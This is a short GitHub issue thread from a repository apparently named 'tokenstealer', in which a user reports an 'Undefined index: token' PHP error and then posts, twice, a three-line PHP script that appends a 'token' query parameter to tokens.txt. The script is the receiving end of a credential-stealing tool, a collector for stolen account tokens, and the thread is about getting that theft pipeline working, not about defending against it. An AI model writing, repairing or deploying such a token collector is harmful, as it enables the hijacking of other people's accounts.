### ISSUE TITLE
Bug

### ISSUE THREAD

**Issue by iraizo** [romangraef/tokenstealer#5] opened 2019-02-02 23:50 UTC
#4 same problem, got the error : `Undefined index: token in /home/raizgemj/public_html/1337/index.php on line 2
`

**Comment by lucsoft** [comment] 2019-10-30 18:44
bad bug report show code

Duplicate of #4

**Comment by iraizo** [comment] 2019-10-31 21:50
<?php
file_put_contents('tokens.txt', $_GET['token'] . PHP_EOL, FILE_APPEND | LOCK_EX);
echo "uwu";
?>

**Comment by iraizo** [comment] 2019-10-31 21:51
`<?php
file_put_contents('tokens.txt', $_GET['token'] . PHP_EOL, FILE_APPEND | LOCK_EX);
echo "uwu";
?>
`

**Closed as completed** 2020-07-03 23:48 UTC
